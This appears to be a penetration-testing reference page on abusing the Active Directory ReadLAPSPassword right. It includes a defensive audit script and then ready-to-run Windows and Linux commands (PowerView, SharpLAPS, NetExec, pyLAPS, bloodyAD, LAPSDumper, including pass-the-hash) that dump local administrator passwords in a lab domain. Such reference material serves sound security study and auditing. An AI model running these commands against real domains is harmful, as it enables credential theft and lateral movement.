# ReadLAPSPassword

Microsoft [Local Administrator Password Solution (LAPS)](https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview) is a Windows security feature designed to manage and protect local administrator credentials on domain-joined systems. It automatically generates strong, random passwords for local administrator accounts and rotates them regularly, with a default rotation period of 30 days.

Each managed device runs a LAPS client that periodically updates the local administrator password. After the password is changed, it is securely stored in Active Directory as an attribute of the corresponding computer object. In the legacy implementation, this attribute is called `ms-MCS-AdmPwd`.

Administrators can retrieve the current password using the LAPS management interface or PowerShell. Access to this information is strictly controlled: only users or groups with explicit permission to read the attribute are able to view the stored password.

An attacker can read the `ms-MCS-AdmPwd` attribute after compromising an account that has been granted this permission directly, or that holds `GenericAll` or `AllExtendedRights` over a target computer configured with LAPS.
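
The access condition above can be checked from the defender's side. The following is an added example (not part of the original page or of Microsoft's LAPS tooling) that lists which principals hold `GenericAll`, `AllExtendedRights`, or control access on `ms-MCS-AdmPwd` over LAPS-managed computers. It assumes the RSAT ActiveDirectory module and legacy LAPS; the `$expected` allow-list is hypothetical.

```powershell
# Added audit example; assumes the RSAT ActiveDirectory module and legacy LAPS.
Import-Module ActiveDirectory

$ADR         = [System.DirectoryServices.ActiveDirectoryRights]
$inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly

# Look up the attribute's schemaIDGUID in the schema instead of hard-coding it.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$attr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
if (-not $attr) { throw 'ms-Mcs-AdmPwd is not in the schema, so legacy LAPS is not deployed.' }
$lapsGuid = [guid]$attr.schemaIDGUID
$anyGuid  = [guid]::Empty   # empty ObjectType = every property / every extended right

# Hypothetical allow-list (regex) of principals expected to hold these rights.
$expected = '\\(Domain Admins|Enterprise Admins)$|^NT AUTHORITY\\SYSTEM$'

# Only computers that LAPS manages carry an expiration time.
$report = foreach ($c in Get-ADComputer -LDAPFilter '(ms-Mcs-AdmPwdExpirationTime=*)') {
    foreach ($ace in (Get-Acl -Path "AD:\$($c.DistinguishedName)").Access) {
        # Skip deny ACEs and ACEs that only apply to child objects.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.PropagationFlags -band $inheritOnly) { continue }

        $rights = $ace.ActiveDirectoryRights
        $reason = if ($rights.HasFlag($ADR::GenericAll)) {
            'GenericAll'
        } elseif ($rights.HasFlag($ADR::ExtendedRight) -and $ace.ObjectType -eq $anyGuid) {
            'AllExtendedRights'
        } elseif ($rights.HasFlag($ADR::ExtendedRight) -and $ace.ObjectType -eq $lapsGuid) {
            # The attribute is confidential, so a usable read delegation includes control access.
            'Control access on ms-Mcs-AdmPwd'
        }

        if ($reason) {
            [pscustomobject]@{
                Computer  = $c.Name
                Principal = $ace.IdentityReference.Value
                Reason    = $reason
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Show only principals outside the allow-list.
$report | Where-Object Principal -notmatch $expected |
    Sort-Object Computer, Principal | Format-Table -AutoSize
```

Any principal in the output that is not an intended LAPS reader is a delegation to review and, where it is not needed, remove.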

### Windows

The LAPS password can be read using the Active Directory PowerShell module, PowerView, or [SharpLAPS](https://github.com/swisskyrepo/SharpLAPS).

{% code overflow="wrap" %}

```powershell
# Active Directory PowerShell module (single host)
# -Identity and -Filter belong to different parameter sets and cannot be combined
Get-ADComputer -Identity DC01 -Properties 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# Active Directory PowerShell module (all hosts with a LAPS expiration time set)
Get-ADComputer -Filter {ms-mcs-admpwdexpirationtime -like '*'} -Properties 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# PowerView
Get-DomainComputer "DC01" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# SharpLAPS
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"

# Enumerate all LAPS-enabled hosts (PowerView)
Get-DomainComputer -Properties name | ForEach-Object {
    $computer = $_.name
    $obj = Get-DomainObject -Identity $computer -Properties 'ms-mcs-AdmPwd','name' -ErrorAction SilentlyContinue
    if ($obj.'ms-mcs-AdmPwd') { Write-Output "$computer`: $($obj.'ms-mcs-AdmPwd')" }
}
```

{% endcode %}

### Linux

The LAPS password can be read from a Linux host via [NetExec](https://github.com/Pennyw0rth/NetExec), [BloodyAD](https://github.com/CravateRouge/bloodyAD), [pyLAPS](https://github.com/p0dalirius/pyLAPS), or [LAPSDumper](https://github.com/n00py/LAPSDumper).

{% code overflow="wrap" %}

```bash
# NetExec: read the password of all computers (or specify a target host)
nxc ldap 10.10.10.5 -u x7331 -p 'Passw0rd123!' -M laps [-o COMPUTER='DC01$']

# pyLAPS
pyLAPS.py --action get [--computer 'DC01$'] -u x7331 -d marvel.local -p 'Passw0rd123!' --dc-ip 10.10.10.5

# BloodyAD
bloodyAD -u x7331 -d marvel.local -p 'Passw0rd123!' --host 10.10.10.5 get object 'DC01$' --attr ms-Mcs-AdmPwd

# LAPSDumper: basic usage
python laps.py -u x7331 -p 'Passw0rd123!' -d marvel.local

# LAPSDumper: PtH on a specific LDAP server
python laps.py -u x7331 -p '<hash>' -d marvel.local -l dc01.marvel.local
```

{% endcode %}

For an example of reading the LAPS password with NetExec, see [Timelapse](https://x7331.gitbook.io/boxes/boxes/easy/timelapse#laps).
